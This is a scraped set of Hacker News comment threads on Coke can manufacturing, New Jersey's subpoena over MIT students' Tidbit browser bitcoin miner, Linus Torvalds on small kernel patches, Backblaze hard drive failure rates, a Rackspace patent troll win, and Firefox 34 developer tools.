"Interior can coatings designed to prevent migration of metal salts into the contained product are called "comestible polymeric coatings". The coatings are polymers typically used in coil coating. The exact nature of the coatings isn't available since most are proprietary to manufacturers who continuously look for better coatings."

source: http://www.eng-tips.com/viewthread.cfm?qid=258261

JacobAldridge 5 days ago 1 reply      
Actually, the Pinjarra process creates Aluminium. The process of shipping it to Long Beach CA converts it into aluminum.
neya 5 days ago 2 replies      
I'm surprised that the author hasn't mentioned the use of toxins (pesticides)[1], to the extent that it is even being used as a real pesticide in various parts of India.

I know some may find this offensive, but sorry, I think I have a moral responsibility myself to let the people around me know of the harms caused by this carcinogen[1].



makmanalp 6 days ago 0 replies      
My favourite version of this is a picture of a boeing 787 and where all the parts are manufactured: http://seattletimes.com/art/news/business/boeing/787/partsen...

Of course if you could break it down further into smaller parts and tools to manufacture those parts, you'd get an even greater variety of countries and companies.

The center where I work actually does work slightly related to this, https://www.youtube.com/watch?v=0JC24CBVsdo

Theodores 6 days ago 1 reply      
You could say this about any product. I think the essay would be considerably longer if it concerned a typical PC or phone, not to mention a car.

I also think the essay can be written with cynicism instead of wonder, e.g. with an anti-capitalist slant. With one innocuous affordable purchase you can deforest and pollute four continents whilst giving yourself diabetes and dental caries!!!

gburt 6 days ago 0 replies      
I am reminded of I, Pencil. [1]

[1] http://www.econlib.org/library/Essays/rdPncl1.html

jeffbarr 6 days ago 2 replies      
This is my favorite sentence of the article:

> Modern tool chains are so long and complex that they bind us into one people and one planet.

When we think about colonizing the Moon or Mars with small groups of people with the intention of making the colonies self-sustaining over time, deep, long-evolved tool chains like the one described in the article could be very difficult to scale down and to replicate in other environments.

raverbashing 6 days ago 1 reply      
"The top of the can is then added. This is carefully engineered: it is made from aluminum, but it has to be thicker and stronger to withstand the pressure of the carbon dioxide gas, and so it uses an alloy with more magnesium than the rest of the can"

Yes, but the pressure is the same on all parts of the can. Ok, almost the same, still.

Maybe because of the parts that have been cut to make it easy to open?

Tloewald 4 days ago 0 replies      
This article reminds me strongly of a pivotal passage in the novel Gain, by Richard Powers (which I can't recommend highly enough, although it's a downer). In that passage he describes how a disposable film camera is made.
AlyssaRowan 5 days ago 0 replies      
Not that I want to waste any time on a HPLC-MS machine on this, but I was distinctly under the impression Coca-Cola 7X does not actually contain kola nut?

I've had Red Bull Cola, and actually found it quite different, but delicious. No accounting for taste, though.

NotOscarWilde 6 days ago 2 replies      
Speaking as somebody who's never even smoked a cigarette or a joint: are there people who tried to recreate the "original" coke recipe? The one with "unprocessed" coca leaves? Is it available on say the latest instance of Silk Road? What is it like?
lpolovets 5 days ago 0 replies      
There's a book with a similar theme about Twinkies. It's called "Twinkie, Deconstructed" (http://www.amazon.com/gp/product/B000OZ0NZS)
exacube 5 days ago 2 replies      
How can 0 people know what's in Coke while still getting it FDA approved? Surely this can't be true.. How does the company know how to make a can of coke if they don't know how it's put together?
TazeTSchnitzel 6 days ago 1 reply      
> The number of individual nations that could produce a can of Coke is zero.

While this is true in that no individual nation could produce Coke with the exact same formula, an individual nation could surely produce a soft drink.

Istof 6 days ago 1 reply      
"[...] and the edges of the can are folded over it and welded shut."

I never thought there was any weld in a soda can... (and I still don't think there is any)

cbhl 6 days ago 1 reply      
Article title should probably contain (2013).
justintocci 6 days ago 1 reply      
I wonder what the failure rate on the interior coating is? How often are people ingesting dissolved aluminum?
swartkrans 6 days ago 1 reply      
Is the ammonia dangerous? Or can it be? How much ammonia can a person consume before it becomes dangerous?
alecco 6 days ago 1 reply      
To keep you drinking they add plenty of sodium (50mg+) masked with sugar, HFCS, or sweeteners. They also add caffeine as a diuretic to keep consumers drinking, too. And then they market it to children, lovely people.

Check out Dr. Robert Lustig videos. Also, the book Salt, Sugar, Fat, about food industry engineering.

yarou 6 days ago 0 replies      
He forgot to mention the Colombian paramilitaries that break up Coke bottling plant unions by kidnapping their children. Funny how "globalization" is presented in a saran-wrapped, sanitized version.
InclinedPlane 5 days ago 0 replies      
This is good, although I think it reaches just a little too far when it says that the number of nations that could produce a can of coke is zero. If the US so desired it could grow coca leaves, and kola nuts, and use locally produced aluminum, etc.
Smachine 6 days ago 0 replies      
Think of all of the jobs the making of Coke provides. Oh here we go......lol
argumentum 6 days ago 0 replies      
A brilliant paean to the free market and the invisible hand. Milton Friedman once described the manufacture of a humble pencil in this way.

(edit: just saw a link to an essay entitled "I, Pencil" at the bottom .. this might have pre-dated Friedman).

WiggleYourIndex 5 days ago 0 replies      
Clean water tastes better.
joshfraser 6 days ago 1 reply      
1 can of coke contains 160% of your recommended daily intake of sugar. But you won't see that on the label because money.
MIT Students Battle State's Demand for Their Bitcoin Miner's Source Code
413 points by msantos  3 days ago   123 comments top 25
will_brown 3 days ago 4 replies      
There is a lot of confusion in this thread regarding basic concepts of the law.

1. The NJAG is not prosecuting the MIT student(s) (at least not yet). Therefore, this is not similar to the alleged overzealous prosecutors in the Swartz case.

2. A subpoena is a writ compelling testimony or evidence. A subpoena is not synonymous with being a defendant.

3. NJAG served one MIT student with a subpoena to turn over documentation (source code, downloads, users, etc...) for a program which may be being used by third party websites in a way that violates the rights of NJ residents vis-a-vis unauthorized access to computer systems.

4. It seems there is an issue raised arguing NJAG does not have jurisdiction over the MIT student(s). Personally I would find this analysis the most compelling because it is at the intersection of where facts and law meet.

5. EFF is arguing that complying with the subpoena may violate the students' right against self-incrimination. I think this is a losing argument where one's right against self-incrimination is rather limited, generally to information contained within their mind and not typically extended to documentation and records.

6. Though this is not at issue, it would be almost impossible for the MIT student(s) to have committed a crime, as the crime would require intent. It would be nearly impossible to prove the student(s) intended that their code be downloaded by third-party websites for the specific purpose of running on the end users' computers without their knowledge. It would be on par with charging a gun manufacturer criminally for intending that their guns be manufactured and sold for the exclusive purpose of committing crimes.

bertil 3 days ago 3 replies      
That article describes a thought experiment that would A. remove an ad, and B. should (but doesn't) trigger a BitCoin miner. It's clearly marketed as an illustration of an idea. I'm failing to see the consumer fraud. Is this like accusing a car manufacturer of manslaughter because their latest concept car didn't have seat belts?

I would like to know if that's selective reporting from Wired, or spectacular fishing from the NJ state attorney.

Also, neither the hackathon, nor MIT appear to be in NJ: what is their jurisdiction? Those two issues should be clarified in any basic coverage of the incident: at this point, it is plain bad reporting.

eli 3 days ago 1 reply      
The EFF has the actual documents in the case posted https://www.eff.org/cases/rubin-v-new-jersey-tidbit

Based on a quick skim, this is the closest NJ comes to making a case: https://www.eff.org/document/nj-attorney-general-response-ef...

teachingaway 3 days ago 1 reply      
New Jersey's Position is laid out in their 3/7/2014 filing. https://www.eff.org/files/2014/03/07/njs_memo_in_opposition_...

Here's the relevant parts (lightly edited):

The Division issued the Subpoena and Interrogatories in furtherance of its investigation into an entity called Tidbit. Tidbit is a group of students who developed a software code that may have hijacked the computer resources of consumers within the State of New Jersey and improperly accessed and/or used such computer resources to mine for bitcoins for the benefit of Tidbit and its customers and without any notice to, or obtaining consent from, New Jersey consumers, in possible violation of the New Jersey Consumer Fraud Act ("CFA") and Computer Related Offenses Act ("CROA"). Bitcoins are a digital medium of exchange that can be traded on online exchanges for a dollar value. Bitcoins are "mined" through the use of computer resources to solve complex algorithms. Many times, consumers' computer resources are unknowingly accessed by entities through software code or otherwise in order to mine for Bitcoins.

Plaintiff's own description of its services strongly suggests that the code it developed is, in fact, designed to hijack consumer's computers. .... Further, contrary to Plaintiffs allegations in its brief, the Division specifically found Plaintiff's code on the websites of entities located in New Jersey. Furthermore, the Division determined that the code was active.

The following representations, among other things, are made on the Tidbit Website: "Monetize without ads"; "Let your visitors help you mine for Bitcoins;" and "Built on the bleeding edge." The Tidbit Website further provides: "How does it work? ... [1] Make an account - Sign up with your Bitcoin wallet ... [2] Paste the code - we'll give you a snippet to put in your website ... [3] Cash Out! - We'll send a transaction to your Bitcoin wallet." ...

E. The Division's Undercover Investigation

On February 7,2014, the Division re-accessed the Tidbit Website and "Sign up" button. While on the Tidbit 'Website, the Division submitted Sign-up Information to Tidbit using an undercover e-mail address and an undercover bitcoin wallet id. In response to receiving the Division's undercover Sign-up information, Tidbit sent the Tidbit Code to the Division's investigator via a confirmation page on the Tidbit website ("Confirmation Page"). The Tidbit Code that the Division received includes the Division's undercover bitcoin wallet id. Additionally, among other things, the Confirmation Page states: "Your embed code - Paste this at the bottom of your HTML page, and your visitors will start mining Bitcoins for you!" (emphasis in original).)

JacobEdelman 3 days ago 3 replies      
I feel like this article is a bit one sided. It doesn't ever state NJ's case against the students and draws strong parallels to Aaron Swartz (a hero to many people). A lot of the time these parallels seem to be weak, the student who did this is an MIT student who built a piece of software at a hackathon, this has almost nothing to do with Aaron Swartz's situation except it involves a young programmer and MIT.
downandout 3 days ago 0 replies      
There is an option in all browsers to disable javascript. That, combined with the fact that you are requesting files from a website (as opposed to them being surreptitiously forced onto your machine) implies consent to execute the code sent to you. Finally, the code made no attempt to go beyond user-granted access limits (in this case the ability to run javascript in the browser, a decision which is entirely under the control of the user).

I cannot see how a fraud or hacking case of any kind could be made here, even if they got the code.

borlak 3 days ago 0 replies      
Tidbit inspired me to write my own web-miner, which I open sourced. It's hacked together as I was really just trying to learn how the cryptocoin&mining stuff worked. The mining rate you get with straight javascript is truly abysmal, even with web workers (much worse than the standard cpuminer).

I found a couple examples that do the scrypt part with GPU in browser, but your browser has to support custom shaders, I think (I forget the details), and the version most browsers support doesn't allow this (again, my memory is sketchy about the details).

Anyway Here you go, NJ! https://github.com/borlak/cryptocoin_scrypt_stratum

csense 3 days ago 2 replies      
Don't users implicitly consent to a website using their CPU and bandwidth for arbitrary tasks while the website is open, by using a browser that downloads and runs arbitrary JavaScript and allows it to XMLHTTPRequest?

Even if the code in question was being run on a publicly accessible website, was used by a New Jersey consumer, and was fully functional and actually mined Bitcoins (all of those points are disputed by the students' counsel)...The only thing that's being taken by the website operators would be users' CPU cycles and bandwidth. And if the users have implicitly consented to the website's arbitrary use of those resources, how is anyone being harmed?

tgb 3 days ago 5 replies      
What law did they supposedly break?
lotsofmangos 3 days ago 2 replies      
They want source code for a client side javascript miner that they saw on a website. Was their right mouse button broken?
joshdance 3 days ago 2 replies      
This seems insane to me. What law was broken? What could even be considered remotely criminal about this? Seems like a gross overreach by the gov.
peter303 3 days ago 1 reply      
I'd be curious to find out why the NJ AG would get so paranoid about this? I couldn't really find a link to their side of the story.

The National Science Foundation did discipline a researcher who did some mining on their computers.

Cogito 3 days ago 0 replies      
Perhaps most interesting in my reading of the documents provided by the EFF is the correspondence regarding the counter-sue made by Rubin against the NJAG.

In it NJAG lay out exactly what they think Rubin did:

...Plaintiffs development, use and deployment of the Tidbit Code which, by plaintiffs own description, strongly suggests the code was designed to hijack consumer's computers to mine for bitcoins, including the computers of New Jersey consumers. Further, prior to the issuance of the Subpoena and Interrogatories, the Division determined that the Tidbit Code was present and active on the websites of entities located in New Jersey and Plaintiff affirmatively sent the Tidbit Code to the New Jersey based entities.

They posit that the code was

1. Designed to hijack a consumer's computer for the purpose of mining bitcoins

2. The computers targeted for hacking (implicitly the entire internet) include those of New Jersey consumers

3. The code was found on websites owned by New Jersey entities

4. Rubin sent the code "affirmatively" to those New Jersey entities

I think 1. is the weakest point, but that weakness is based on my understanding of the definition of 'hijack'. 2. and 3. seem to follow easily from assumptions, or could be easily shown as fact. 4. seems like it would be harder to prove, but I don't know the implications of the term affirmatively used here.

everettForth 3 days ago 0 replies      
This sounds like some trivial code, not even fully functioning, that was written during a hackathon. Why does New Jersey care?

It wouldn't even make sense as a business model anymore, because ASIC miners are so much more efficient than GPUs, but I heard many people talking about building this kind of service years ago.

NJ could pay a software developer to write them code to let people generate small amounts of bitcoin in a browser. Why would they possibly want this MIT student's code so badly?

codexon 3 days ago 1 reply      
I don't understand how their javascript based miner is feasible.

Mining bitcoins with a CPU is an extremely futile endeavor, and on top of that, it is implemented in asm.js.

Even with thousands of workers, GPU and ASIC mining is anywhere from hundreds to over a MILLION MH/s while modern CPUs top out at 20 with most around 5.


chris_wot 2 days ago 0 replies      
Funny how voting machine companies won't release their source code, but MIT must for Bitcoin? Just a thought.
larssorenson 3 days ago 0 replies      
I don't understand how it could be considered consumer fraud or computer fraud and abuse if it was clearly indicated to the visitor that their browser would be used as a BitCoin miner in lieu of being displayed Ads. Assuming they weren't told, I could see the issue but it didn't seem like they were trying to dupe visitors.
squozzer 3 days ago 0 replies      
It sounds to me like NJ wants to start mining bitcoin. Nothing is sacred when you're running a deficit I guess.
trhway 3 days ago 0 replies      
they need to bring in a couple of seasoned enterprise developers who can hand off any project in such a state that it would be easier to rewrite it from scratch than to even just successfully build it, let alone run/debug/understand it...
ndesaulniers 3 days ago 1 reply      
Thesaurus 3 days ago 1 reply      
Is there another website other than wired with this article?
u124556 3 days ago 1 reply      
They could just, you know, give it to them?
javajosh 2 days ago 0 replies      
How is surreptitious use of compute resource any different than the surreptitious accumulation and analysis of data exhaust? If this moves forward to prosecution, I'd argue it will actually open up an avenue of attack against Facebook, Google, et al.
joshfraser 3 days ago 2 replies      
We're lucky to have an organization like the EFF that fights this nonsense. It's a good time to support their work.


stealthlogic 3 days ago 0 replies      
Fuck New Jersey.
The biggest thing with small patches (2004)
383 points by ohmygeek  1 day ago   37 comments top 13
doughj3 1 day ago 0 replies      
I think this is great advice. While I've only contributed to a couple open source projects and haven't led my own large ones, I completely agree. There's more to submitting patches than writing the patch: understanding contribution guidelines (code style, documentation, testing), responding to feedback, etc.; these are all extremely important in actually contributing to a project. And having even just that little patch merged in feels great when you're starting out.

Plus, no one wants to make a big helpful functional contribution only to be thrown away because they weren't aware of how the community operates. Small patches have a low risk as far as learning about how to contribute, even if the patch is rejected for whatever reason.

Though this seems somewhat obvious, it's nice to have it stated and validated by the leadership of one of the largest open source projects.

efuquen 1 day ago 1 reply      
Great attitude. Linus has had plenty of heated moments on the mailing lists, but 1) he's often right and 2) his venom is usually reserved for experienced developers that really should know better. Glad to see him being so open and accepting with newbie kernel hackers.
shurcooL 1 day ago 0 replies      
That makes a lot of sense. If I look at any project I've contributed to, it always started out with something small. Taking the time to make a small PR that makes a tiny improvement:

- shows you care about improving the project; you took the time to improve something small that others would ignore

- lets you test the waters. Are the project owners receptive of changes? Is it pleasant trying to contribute to the project? Or do they ignore your patch and not reply for 2 weeks? You wouldn't want to spend a lot of effort just to find that out.

- gives you a chance to become familiar with the process, the tools, gain practice, and hopefully get rewarded with your change being accepted

For example, my first CL to Go was a trivial change:


But without having done that (and having a good experience) I couldn't have been working on more complicated changes like https://codereview.appspot.com/142360043/ now.

munificent 1 day ago 0 replies      
Small patches are the "hello world" of open source. They give you a chance to get familiar with and work through the contribution pipeline before you push something sizeable through.

There's little useful about "hello world" as a program, but it ensures you've got your toolchain working correctly, which is a necessary precondition for doing real work. Trivial patches are like that.

ljosa 1 day ago 2 replies      
Ten years later, how is the Linux kernel community doing in terms of cultivating new contributors?
post_break 1 day ago 0 replies      
Reminds me of Lawrence of Arabia. "Big things have small beginnings" I've contributed tiny bug fixes and the feeling was great. I did that, me.
JacobEdelman 1 day ago 4 replies      
Is it just me or is the main reason this is being upvoted so much is because Linus said something without a bad attitude? This isn't a rhetorical question, I honestly want to know.
coherentpony 1 day ago 0 replies      
That, ladies and gentlemen, is how you grow a community.
tehwalrus 1 day ago 0 replies      
I completely agree. The only thing that's topped getting a tiny patch of my own accepted (into pylibtiff) was someone getting me to put a python module I'd written* onto pypi. Both were great feelings, and it's extremely important to encourage such highs in new people contributing to open projects (Linux kernel or random bibtex editor alike.)

* the library was in fact just a python wrapper for some C++ code, but that's where leverage for the original author starts, in bindings.

vezzy-fnord 1 day ago 1 reply      
Seems like it's good to remind people every now and then that Linus is a human with empathy, since a lot of them really don't understand the reasons for when he rants, and then start to draw conclusions.

On a related note, Theo de Raadt rants need far more attention than they currently get.

mwfogleman 1 day ago 1 reply      
Whoa, mentoring Linus had a good day!
GhotiFish 1 day ago 1 reply      
That's a good attitude. If I find myself heading an open source project, I'll take that advice with me.
qwerta 1 day ago 1 reply      
You need a good set of unit tests if you want to survive managing an open-source project.
Hard Drive Reliability Update Sep 2014
378 points by nuriaion  2 days ago   158 comments top 25
disordr 2 days ago 3 replies      
I really want to applaud backblaze for publishing these reports and stats. Too many companies closely guard this information that really helps the larger community. Based on the previous blogs from backblaze, when I built out our new hadoop cluster, I purchased 1450 Hitachi drives. I plan to gather our failure rates and publish them as backblaze does. Thanks for blazing the path!
zaroth 2 days ago 8 replies      
Since annual failure rate is a function mostly of age, it would be interesting to see a line chart of cumulative failure rate vs age. But since new drives are continually being added to the population, there would be fewer drives in the data set as you moved up each curve.

I guess you could calculate confidence intervals at quarterly intervals, and so the error bars would get larger as age increases and 'n' decreases.

How would you calculate the CI for failure rate? It's not binomial or Poisson, since failure rate goes to 1 over time...

A little searching turns up http://rmod.ee.duke.edu/statistics.htm which I'm sure completely explains how to do this... (rolls eyes). I hate that this is how statistics is commonly taught. Knowing which distribution to use and applying it correctly can actually be intuitive if taught properly. It doesn't always need to be an exercise in alphabet soup / deriving from base principles.
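
A worked illustration of the estimate zaroth is asking about, added here as an example; it is not part of the original thread and not Backblaze's own analysis. It computes a Kaplan-Meier estimate of the cumulative failure fraction against power-on hours for a small constructed fleet of drives, using Greenwood's formula for the standard error so the confidence band widens as the number of drives still at risk shrinks, and puts the flat "failures per drive-year" figure beside it for comparison. The drive records, the model name and the hours are all constructed sample data, and the normal-approximation interval is an assumption chosen for simplicity.

```python
import math
from dataclasses import dataclass

HOURS_PER_YEAR = 8766  # 365.25 days


@dataclass
class DriveRecord:
    """One drive's observation. `hours` is power-on hours at failure, or the
    current age if the drive is still running (a right-censored observation)."""
    model: str
    hours: float
    failed: bool


# Constructed sample fleet (not real data): drives were installed at different
# times, so the younger ones contribute only censored observations.
SAMPLE_FLEET = [
    DriveRecord("MODEL-A", 2000, True),
    DriveRecord("MODEL-A", 3000, False),
    DriveRecord("MODEL-A", 5000, True),
    DriveRecord("MODEL-A", 9000, True),
    DriveRecord("MODEL-A", 9000, False),
    DriveRecord("MODEL-A", 12000, False),
    DriveRecord("MODEL-A", 15000, True),
    DriveRecord("MODEL-A", 20000, False),
]


def annualized_failure_rate(records):
    """The flat 'failures per drive-year' figure: total failures divided by
    total exposure. It says nothing about how failure depends on age."""
    failures = sum(1 for r in records if r.failed)
    drive_years = sum(r.hours for r in records) / HOURS_PER_YEAR
    return failures / drive_years


def cumulative_failure_curve(records, z=1.96):
    """Kaplan-Meier estimate of the cumulative failure fraction at each distinct
    failure time, with a Greenwood standard error and a z-sigma normal
    approximation interval. A censored drive stays 'at risk' up to and
    including its last observed hour, then drops out of the denominator."""
    survival = 1.0
    greenwood_sum = 0.0
    rows = []
    for t in sorted({r.hours for r in records if r.failed}):
        at_risk = sum(1 for r in records if r.hours >= t)
        failures = sum(1 for r in records if r.failed and r.hours == t)
        survival *= (at_risk - failures) / at_risk
        if at_risk > failures:  # skip the term when the last drive at risk fails
            greenwood_sum += failures / (at_risk * (at_risk - failures))
        se = survival * math.sqrt(greenwood_sum)
        cum_fail = 1.0 - survival
        rows.append({
            "hours": t,
            "at_risk": at_risk,
            "failures": failures,
            "cum_fail": cum_fail,
            "se": se,
            "ci_low": max(0.0, cum_fail - z * se),
            "ci_high": min(1.0, cum_fail + z * se),
        })
    return rows


def print_report(records):
    print(f"Flat AFR: {annualized_failure_rate(records):.1%} per drive-year")
    print(f"{'hours':>6} {'n':>3} {'d':>2} {'cum fail':>9}  95% CI")
    for row in cumulative_failure_curve(records):
        print(f"{row['hours']:>6.0f} {row['at_risk']:>3} {row['failures']:>2} "
              f"{row['cum_fail']:>9.1%}  [{row['ci_low']:.1%}, {row['ci_high']:.1%}]")


if __name__ == "__main__":
    print_report(SAMPLE_FLEET)
```

The `at_risk` column is the `n` that shrinks as age increases, and `se` grows with it, which is exactly the widening error bar described above. Feeding the curve power-on hours from SMART rather than calendar age keeps drives that sat on a shelf from looking older than they are.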

ChuckMcM 2 days ago 1 reply      
One of the challenges I have with this analysis is that a 'failure' isn't just that your drive is no longer working, it is that your drive isn't working and you have to go replace it. The operational costs of replacing a drive have three parts, loss of production while the drive is offline, operator time to physically replace the drive and prep it for re-entry into the system, and transactional costs of doing a warranty replacement (filling out the RMA form, getting a valid RMA, shipping and receiving replacements). We minimize the latter by doing RMAs in batches of 20 but it's still a cost across those 20 drives. (and the population of 40 drives which exist as spares are effectively not available for production). It isn't as simple as 'sure drives fail a bit more often but we don't expect to use them that long.'
michaelbuckbee 2 days ago 3 replies      
Biggest takeaway was at the end, with the "enterprise" drives being slightly less reliable than the consumer ones at half the cost.
emodendroket 2 days ago 8 replies      
How times have changed; Seagate used to be (or at least have the reputation of being) the most reliable and Hitachi the least.
shiftpgdn 2 days ago 2 replies      
I manage a computation cluster for an oil and gas exploration company. We have a 50% failure (and rising!) of Seagate Constellation drives in 250GB, 1TB and 2TB configurations. My sample size is fairly small at a few hundred drives but man does it keep me busy.
archgrove 2 days ago 1 reply      
Not that I use even 0.001% of the disks that BackBlaze go through, but my anecdata suggests the same. The only dead hard disks I have on my desk at the moment are Seagate, and they dominate the disks I've sent back in the last few years.

However, they are cheap, and they do honour their warranties. Would just be nice if they didn't have to quite so much.

saosebastiao 2 days ago 2 replies      
Tangential: When are you going to offer a linux client?
GravityWell 13 hours ago 0 replies      
This is extraordinarily useful and unique. My compliments to Backblaze for making this available. This is the type of empirical data I would love to have for as many things as possible: SSDs, monitors, TVs, kitchen appliances, tablets, cars, etc.
tambourine_man 2 days ago 3 replies      
I love reading these posts from Backblaze, but what I never understand is that they are getting a cost of US$ ~0.05/GB with their storage pods:


At these rates, why not use S3? What am I missing?

makmanalp 2 days ago 1 reply      
Anyone have any reliability information on Hitachi's new NAS drive series? They're supposed to build on the 7k3000 etc, but specifically tailored for NAS / RAID situations, like WD Reds. One major difference is that they're 7200 rpm instead of 5400 which is most non-high-end NAS drives.
cake 2 days ago 2 replies      
I wish there was something similar for SSDs.
justcommenting 2 days ago 1 reply      
There are well established methods for time-to-failure and time-to-event data not used here. The author makes no effort to control for the multiple, obvious biases created by the analytical approach employed. A few simple graphs would give a much more telling view of these data.
TheLoneWolfling 2 days ago 0 replies      
I'd be interested to see what a graph of percentage remaining versus time since installation looks like for these. Might give a better picture of what's going on.
shadeless 2 days ago 0 replies      
I recently bought 3TB Western Digital Red, following their advice from [1], but now I see that it has yearly failure rate of 8.8%, bummer.

Off-topic, but it's a shame that BackBlaze isn't available in some countries, I'd love to use it. What would be the best alternative to it, Tarsnap?

[1] https://www.backblaze.com/blog/what-hard-drive-should-i-buy/

BuckRogers 1 day ago 1 reply      
I keep seeing this stuff over the years, so I go buy something other than Seagate like WD... and they fail within a year. So I replace it with a Seagate and no problems for years. See another report that says Seagate is terrible- repeat process.

I'm just going to keep using Seagate until my anecdata refutes the reality I live in.

rancor 2 days ago 0 replies      
Used in a small file server, my net failure rate on Seagate's consumer 3TB drives has been over 50% thus far. The pair of their SAS drives I currently have in use have been fine, although both of them are still below a year of service life... Edit: Just checked my drive status, and yet another one has dropped. If I'm doing my math correctly, that's 75% of the drives that weren't DOA...
cgore 2 days ago 2 replies      
My main Linux box has quite a few hard drives in it from a large range of time. About 4 weeks ago the oldest of them all died: it is from 2007, so about 7 years old, which I think is pretty good for a consumer drive that's on 24/7. It was a Western Digital Caviar SE WD3200JB, 320GB. I replaced it with a 2TB drive.

[No lost data, I do daily backups.]

sauere 2 days ago 1 reply      
Hard drive age is a bad parameter to use. It should be the hours the drive was actually powered on.
BradRuderman 2 days ago 1 reply      
Let's get a blog post describing how they handled reimbursements for the drive farming. I imagine it to be incredibly complicated to cross reference a receipt with a product at that scale, especially since all the products were the same.
arb99 2 days ago 1 reply      
Very off topic, but their html is wrong:

"<a href='https://www.backblaze.com/blog/hard-drive-reliability-update... src='https://www.backblaze.com/blog/wp-content/uploads/2014/09/bl... alt='Hard Drive Failure Rates by Model' width='560px' border='0' /></a>"

should be "width='560'" not "width='560px'"

ars 2 days ago 1 reply      
No Toshiba hard disks apparently.

HGST and Western Digital are the same company, but it seems they have separate product lines? It's confusing.

mercurialshark 2 days ago 1 reply      
All my WD and Seagate drives have failed within two years of use. Call me the luckiest.
robomartin 2 days ago 0 replies      
Thanks for sharing such useful data. I just had a Seagate drive fail. Was able to recover data since the last local backup with various tools. It took hours of repair work.

I've been procrastinating about getting off-site backup. This post on HN reminded me that I've been meaning to get an account going with your company for a while. I just signed up and will test on my machine before deploying to other machines in my business. Thank you.

larrys 2 days ago 2 replies      
Question for the OP here (or for anyone else).

Do you burn in new drives before using? I typically will take any new drive and do some type of stress test [1] on it for 18 to 24 hours to see if it fails with that initial constant use.

[1] Constant reformatting for example writing 0's to the entire disk 7 times etc.

Another Patent Troll Slain. You Are Now Free to Rotate Your Smartphone
383 points by VanL  3 days ago   41 comments top 9
crhulls 3 days ago 6 replies      
Startups can pool together to fight these guys. My company, Life360, got sued after raising $50m. They thought this meant we had money to write checks from, but instead we decided to use it to fight.

We're basically being sued for allowing you to click a marker on a map initiating a phone call.

This obviously should never have been patented, so we are doing all the legal defense work and sharing it with the startup community.

See www.stopagis.com if you want to see how we really pissed off our troll.

And public shaming also works, the CEO of our troll didn't own his domain, so we bought it and drive traffic to the site whenever people search for his name (Malcolm Beyer www.malcolmbeyer.com). They don't like that we "aren't playing by the rules".

r00fus 3 days ago 9 replies      
"Rotatable sued us and immediately asked for $75,000 to go away. We refused. And we fought. It's Rackspace policy to not pay off patent trolls, even if it costs us more to fight. Eventually Rotatable offered to just walk away but we refused again. Just as we promised last year, we challenged the patent and the USPTO invalidated it.

This means that Rackspace will not pay one penny to this troll, nor will Apple, Netflix, Electronic Arts, Target, Whole Foods or any of the other companies sued by Rotatable for how they use screen rotation technology in their apps."

It surprises me why there aren't joint defense funding efforts in place to put these industry pests to bed... Clearly Apple, Google and Microsoft would have been next on Rotatable's target list if Rackspace had caved - and like weeding, rooting them out early will prevent infestations.

Is it because the big corps perhaps view the trolls as worth their pain - what function could they serve?

jmedwards 2 days ago 0 replies      
Rotatable sued us and immediately asked for $75,000 to go away. We refused. And we fought. It's Rackspace policy to not pay off patent trolls, even if it costs us more to fight. Eventually Rotatable offered to just walk away but we refused again. Just as we promised last year, we challenged the patent and the USPTO invalidated it.

This is an excellent strategy and will pay dividends to RackSpace in the long term: what minor patent trolls will touch them now?

ps4fanboy 3 days ago 2 replies      
This has really bought Rackspace a lot of good will in my mind. Every time I read an article like this I find myself wanting to do business with them more and more.
luxstyle 3 days ago 2 replies      
Why do trolls still try to sue Rackspace? They publicly proclaim their anti-troll policy. If 88% of these cases kill the troll when they go through the courts fully, I would stay well away from them if I was a patent troll.
shittyanalogy 2 days ago 2 replies      
This is fun and all but calling the patent troll slain is a bit optimistic. Most likely "Rotatable Technologies" was specifically created to sue companies for this patent so they could simply go out of business if things got too rough. The larger patent troll, I'm sure, considers this loss a normal part of doing business and will continue with other patents. This does not get any better simply because one patent was invalidated.

We need legislative change, not to fight fire with fire. Public perception of these companies being trolls and detrimental to innovation is important but this is not a victory. It is simply not a loss and still an enormous waste of resources. We need patent reform.

arbuge 3 days ago 0 replies      
>> We are still fighting some of the trolls that have come after us and we expect to win those cases too. Without changes in the law we believe that the only way to end the plague of patent trolls is by fighting every troll that comes at us and we encourage all others to do the same.

Needless to say, Rackspace can afford this strategy whereas smaller companies, who have no full-time attorneys on staff and little funds to retain outside counsel, generally cannot. A change in the law to legislate patent trolls out of existence is still needed, basically yesterday.

dthunt 3 days ago 1 reply      
I am a strong advocate of the following principle:

Defeat your enemies.

Rackspace deserves some big props, here. More should follow their example.

tempodox 2 days ago 0 replies      
Nice going, and a service to the community. Thanks!
New Developer Tools Features in Firefox 34
363 points by xOnic  3 days ago   65 comments top 21
azinman2 3 days ago 2 replies      
Ok debug logging into a table is probably one of the best improvements to logging I've seen in a long time. I kinda want this in every programming language. There are so many useful things about it, especially the ability to then randomly sort it at will!
bshimmin 3 days ago 3 replies      
The jQuery events inspector looks super useful.

I keep meaning to give Firefox another try - after ditching it for Safari, and then Chrome, some years ago - but I never quite find the motivation.

diafygi 3 days ago 1 reply      
Is the bug that re-requests source files when opening the debugger fixed yet?


genericacct 3 days ago 2 replies      
I was excited about the WebIDE but apparently it's only for firefox OS apps. Is there any way of linking a webIDE to devTools? I'd pay for a tool that lets me click on a jsconsole error message and then takes me straight to the editor at that line and column on the original file.
frankzander 3 days ago 0 replies      
What about Firebug? How long will Firebug live in sight of the developer tools becoming better and better?
Kiro 3 days ago 2 replies      
Finally a way to easily inspect and delete cookies on the run. I remember getting voted down here for complaining about it previously.

EDIT: Ok, read-only. Too bad but at least they have it planned.

Tloewald 3 days ago 2 replies      
A ton of very compelling stuff. I hope it all works nicely; I have found the Firefox dev tools to be weirdly clunky of late and keep going back to Chrome, but this may drag me back.
allan_s 2 days ago 1 reply      
Something that got "broken" for me in recent versions of Firefox (I think starting with 32) is that doing a console.log of a very long string does not display the whole string anymore,

i.e. it will print

"a looooooong string [..]" (with the [..])

Same if I try to observe the variable in the debugger. And I can't find a way to get the full string in any way. I understand for a lot of things you don't want to print accidentally a 200k-character-long string as it will use a lot of memory for maybe nothing, but in my current use case (getting long XML documents to copy-paste them into a beautifier / send to a colleague as attachments for a bug report etc.) it breaks my workflow (I'm posting here because Google does not seem very talkative about this issue).

pdknsk 3 days ago 1 reply      
The only feature in Firefox I miss in Chrome is the view that shows the stacked layers of a website. I dismissed it when I first tried, but it can be surprisingly useful. It's no reason to make me switch to Firefox though.


leeoniya 3 days ago 1 reply      
Is there any way of making the inspector show simple textContent inline with the nodes without having to unfold them? I keep going back to Firebug for this.

rather than

    <em>       test    </em>

dubcanada 3 days ago 1 reply      
Does anyone know if there is a way to theme the developer tools? Like you can do in Chrome?

Like https://chrome.google.com/webstore/detail/devtools-theme-zer...

